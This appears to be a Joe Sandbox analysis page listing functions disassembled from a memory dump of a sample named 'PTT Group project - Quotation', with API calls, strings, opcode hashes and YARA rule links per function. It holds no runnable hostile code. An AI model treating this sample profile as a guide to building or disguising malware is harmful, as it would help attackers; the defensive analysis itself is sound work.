Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: a24afcfa4cf300cd6df012ee765fb8503121996f075e60d2a3e1afceb0e33324
Instruction ID: ff6edf8292a1b04560434a9fdd1d02676e90392d8c21de90826c14fed087e88c
Opcode Fuzzy Hash: a24afcfa4cf300cd6df012ee765fb8503121996f075e60d2a3e1afceb0e33324
Instruction Fuzzy Hash: 8C419271B01208DFDB15CF64C884BAABBB9EF85310F1580AAAD15DF209D7B1DE40DBA0

Function 00972C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00972CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00972CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00972D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009D6890,00000000), ref: 00972D5A

Strings

0, xrefs: 00972CA4

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0119b70c6f84f45bbf28b89e7e1efc9a0d2adba57078dd8b5300ad1ab6e8652d
Instruction ID: bab124f592f6be5d356f55993119dda8c40f1388f056ec1a2c3b68eaf1d8f0a6
Opcode Fuzzy Hash: 0119b70c6f84f45bbf28b89e7e1efc9a0d2adba57078dd8b5300ad1ab6e8652d
Instruction Fuzzy Hash: 264191322143029FD724DF24D845B5ABBE8EF85320F14865EF969D72E1D770E904CB92

Function 0098DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0098DAD9

Part of subcall function 009179AB: _memmove.LIBCMT ref: 009179F9

Strings

winapi, xrefs: 0098DB4A
none, xrefs: 0098DBB4
cdecl, xrefs: 0098DB30
stdcall, xrefs: 0098DB5B

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: fd16e024d527917d764871ae6d9642d19618fceac5f6662d57ed0c00d1b10756
Instruction ID: 97444ddbaafc737617a91282eb7042299f719fec593a99b371c3a3c0c7d93c7b
Opcode Fuzzy Hash: fd16e024d527917d764871ae6d9642d19618fceac5f6662d57ed0c00d1b10756
Instruction Fuzzy Hash: A831737160461A9BCF10EF54C891AEEB3B9FF85310F108619E875977D1DB31A905CB80

Function 00969372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Part of subcall function 0096B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0096B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009693F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00969409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00969439

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

Strings

ListBox, xrefs: 009693B5
ComboBox, xrefs: 00969380

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: c0554dacc1ba04541aee52f7ba7ef1b2eaa5f9f1597f5d10c5f118e8fa06b01c
Instruction ID: 6ffd56954ef03d4a622f91f2d2f9d5a3cf133a1919dc2629b1532fcc73f82234
Opcode Fuzzy Hash: c0554dacc1ba04541aee52f7ba7ef1b2eaa5f9f1597f5d10c5f118e8fa06b01c
Instruction Fuzzy Hash: 82210571A04108BFDB14ABB4DC85EFFB77CDF85360B104129F826972E0DF350A4A9620

Function 00996656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00911D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00911D73
Part of subcall function 00911D35: GetStockObject.GDI32(00000011), ref: 00911D87
Part of subcall function 00911D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00911D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009966D0
LoadLibraryW.KERNEL32(?), ref: 009966D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009966EC
DestroyWindow.USER32(?), ref: 009966F4

Strings

SysAnimate32, xrefs: 009966AB

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 620b24558f3058d94efb65b591ad8ab1fdeeb8a68cd6ba4cb2faa629955fd673
Instruction ID: 18b70cfcc2c2c7180ac24e276f3a1fcd5a48db588602cff6750171b790d1a28e
Opcode Fuzzy Hash: 620b24558f3058d94efb65b591ad8ab1fdeeb8a68cd6ba4cb2faa629955fd673
Instruction Fuzzy Hash: D7219D7121020AABEF104FACEC81EBB77ADEB59368F10462AF910D2190D771CC91A760

Function 0097703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 0097705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00977091
GetStdHandle.KERNEL32(0000000C), ref: 009770A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009770DD

Strings

nul, xrefs: 009770D8

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 2c252eea69dac56e1652f4ce5679366df4e4255659b92e47cce1626a568ff4da
Instruction ID: 942ec9110db738b29779f9a84d17b373ce6dd56771dff4600547f598d57211da
Opcode Fuzzy Hash: 2c252eea69dac56e1652f4ce5679366df4e4255659b92e47cce1626a568ff4da
Instruction Fuzzy Hash: 16216576504209ABDF209F78DC05B9AB7B8FF84724F208A1AFCA5D72D0D7719850CB50

Function 0097710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0097712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0097715D
GetStdHandle.KERNEL32(000000F6), ref: 0097716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009771A8

Strings

nul, xrefs: 009771A3

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: d332ab6c8eeffbfe963a67569b66819c610960f607d3c603374d458f0a612c7b
Instruction ID: 9585868f704e8c69921395cf3e3bbbdd20579c034a97370a03ab8c7e5a96ee33
Opcode Fuzzy Hash: d332ab6c8eeffbfe963a67569b66819c610960f607d3c603374d458f0a612c7b
Instruction Fuzzy Hash: 4121A17650C2059BDF209FA89C04BAAF7ACAF55720F608A1AFCB4D32D0D770A851CB60

Function 0097AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0097AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0097AF13
__swprintf.LIBCMT ref: 0097AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,0099F910), ref: 0097AF6A

Strings

%lu, xrefs: 0097AF26

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: ada25a2cf90924307be86a136317f459fa94acdf468092c5325d39e8877e90c2
Instruction ID: 17355a5f330133aaed96b16c1972a2249d9c834f65857ec5c2fca0b9f8686093
Opcode Fuzzy Hash: ada25a2cf90924307be86a136317f459fa94acdf468092c5325d39e8877e90c2
Instruction Fuzzy Hash: 4C214431A0410DAFDB10DF55CD95EEEB7B8EF89704B104069F909DB251DB31EA41DB61

Function 0096A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00917D2C: _memmove.LIBCMT ref: 00917D66

Part of subcall function 0096A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0096A399
Part of subcall function 0096A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0096A3AC
Part of subcall function 0096A37C: GetCurrentThreadId.KERNEL32 ref: 0096A3B3
Part of subcall function 0096A37C: AttachThreadInput.USER32(00000000), ref: 0096A3BA

GetFocus.USER32 ref: 0096A554

Part of subcall function 0096A3C5: GetParent.USER32(?), ref: 0096A3D3

GetClassNameW.USER32(?,?,00000100), ref: 0096A59D
EnumChildWindows.USER32(?,0096A615), ref: 0096A5C5
__swprintf.LIBCMT ref: 0096A5DF

Strings

%s%d, xrefs: 0096A5D9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: c3b19e07467fed5d26765270728ba401a1c9b2ea10e021943a1cd66727237adb
Instruction ID: de05010232d96597a7475048bbf260b343814e926fa84497885ded0134ee29c0
Opcode Fuzzy Hash: c3b19e07467fed5d26765270728ba401a1c9b2ea10e021943a1cd66727237adb
Instruction Fuzzy Hash: 2D11B171604209BBDF10BFA4EC85FEAB77CAF88704F044075B908AA192DA7099859F79

Function 00972017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00972048

Strings

APPEND, xrefs: 00972081
REMOVE, xrefs: 0097204E
KEYS, xrefs: 0097205F
EXISTS, xrefs: 00972070

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 42c8f65c3584db79e8503620a7eb1904bb3144e0bc90d13d2367eb3e41d0722c
Instruction ID: 8ba67fd203e1546784046cac51c1fb0da1e5d857cee90f2a4a042b3281d68cf1
Opcode Fuzzy Hash: 42c8f65c3584db79e8503620a7eb1904bb3144e0bc90d13d2367eb3e41d0722c
Instruction Fuzzy Hash: EF115E3591420DCFCF10EFA4D891AEEB7F8FF55304F508469D859A7291DB325906CB51

Function 0098EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0098EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0098EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0098F07E
CloseHandle.KERNEL32(?), ref: 0098F0FF

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 505dc2947946ef109bb2844ba55ec875abb91b0feda029ed4c6f1aede18852ec
Instruction ID: 7f6fa3034fda85d136434d0ea251f42776df594eb0f3ba528e0f47370ed0a9e8
Opcode Fuzzy Hash: 505dc2947946ef109bb2844ba55ec875abb91b0feda029ed4c6f1aede18852ec
Instruction Fuzzy Hash: 3D814271704311AFD720EF28C856F6AB7E5AF88710F14881DF59ADB392DB71AC448B91

Function 009902C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Part of subcall function 009910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00990038,?,?), ref: 009910BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00990388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009903C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0099040E
RegCloseKey.ADVAPI32(?,?), ref: 0099043A
RegCloseKey.ADVAPI32(00000000), ref: 00990447

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 67a0faf29c707f142151847457f712bcd4ee75977ed7828ad6a78386ead545e0
Instruction ID: 26a08b880f03b5c0f1b5ab9450d1f42d85a048529cc4c84a7b16cdbecec786b8
Opcode Fuzzy Hash: 67a0faf29c707f142151847457f712bcd4ee75977ed7828ad6a78386ead545e0
Instruction Fuzzy Hash: 05513C31208205AFDB04EF58C891FAEB7E9FFC8704F44892EB595872A1DB31E945DB52

Function 0098DBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0098DC3B
GetProcAddress.KERNEL32(00000000,?), ref: 0098DCBE
GetProcAddress.KERNEL32(00000000,00000000), ref: 0098DCDA
GetProcAddress.KERNEL32(00000000,?), ref: 0098DD1B
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0098DD35

Part of subcall function 00915B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00977B20,?,?,00000000), ref: 00915B8C
Part of subcall function 00915B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00977B20,?,?,00000000,?,?), ref: 00915BB0

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 40822a35e79ba9a08073f2b389dc3233b274ebfecc0e18351c50d414ca144afb
Instruction ID: 6cb992a9ff6b35a865b34e522a001f73292cca32bdf55da7cd7b794c4e23df27
Opcode Fuzzy Hash: 40822a35e79ba9a08073f2b389dc3233b274ebfecc0e18351c50d414ca144afb
Instruction Fuzzy Hash: DE512835A04209DFCB00EFA8C4949ADB7F5FF89310B058069E859AB3A1DB30ED85CB90

Function 0097E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0097E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0097E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0097E8F2

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0097E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0097E91F

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 6950378d643906f5abaf4941532fb5783438addebb0de01846330585eb70ce01
Instruction ID: e8abe03fec4b38d1642a6b12d0ecf792e037b5ce389d2e765816c4d891e89aa9
Opcode Fuzzy Hash: 6950378d643906f5abaf4941532fb5783438addebb0de01846330585eb70ce01
Instruction Fuzzy Hash: F6510A35A00209DFCF05EF68C991AAEBBF5FF48314B1480A9E949AB361CB31ED51DB51

Function 0099A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1466b025b27f332e72410c7e86036a759a0e7981cfa9cb3681e9f41182426d39
Instruction ID: 68a9ddc5b4b1805fa2ed926e6ad6ed511e38e3ad50bf1e03b06251cd07212ce8
Opcode Fuzzy Hash: 1466b025b27f332e72410c7e86036a759a0e7981cfa9cb3681e9f41182426d39
Instruction Fuzzy Hash: 9041D135904204AFDF20DF2CCC5AFA9BBA8EB09310F154165F856E72E1D774AD81EAD1

Function 00912344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00912357
ScreenToClient.USER32(009D67B0,?), ref: 00912374
GetAsyncKeyState.USER32(00000001), ref: 00912399
GetAsyncKeyState.USER32(00000002), ref: 009123A7

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 0e4f4bf814896b54762f083db3f9297e4e666d0d4a8ef80d6b392786d8126470
Instruction ID: 4dd43a067d0f7edd93844955400617c8a9d8890801093598bb65c07bb3dbc7e5
Opcode Fuzzy Hash: 0e4f4bf814896b54762f083db3f9297e4e666d0d4a8ef80d6b392786d8126470
Instruction Fuzzy Hash: A2417171608219FFDF19AF68C844EE9FB78FB45760F10435AF83496290C774A9A0DBA1

Function 00966920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0096695D
TranslateAcceleratorW.USER32(?,?,?), ref: 009669A9
TranslateMessage.USER32(?), ref: 009669D2
DispatchMessageW.USER32(?), ref: 009669DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009669EB

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 9ac7b5d84b9d8ad2be90dfa64f49cc2e40bb5fad2bf8c5c55f16d0600f1f7a06
Instruction ID: 89c92d953416538ab3ff7414dcde7029513886b60349ea6b893dd50dabbe1c2d
Opcode Fuzzy Hash: 9ac7b5d84b9d8ad2be90dfa64f49cc2e40bb5fad2bf8c5c55f16d0600f1f7a06
Instruction Fuzzy Hash: 6731D57195924AAFDB20CFB4DC44FF6BBBCAB11304F14456AE825D31A1D734D885EBA0

Function 00968F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00968F12
PostMessageW.USER32(?,00000201,00000001), ref: 00968FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00968FC4
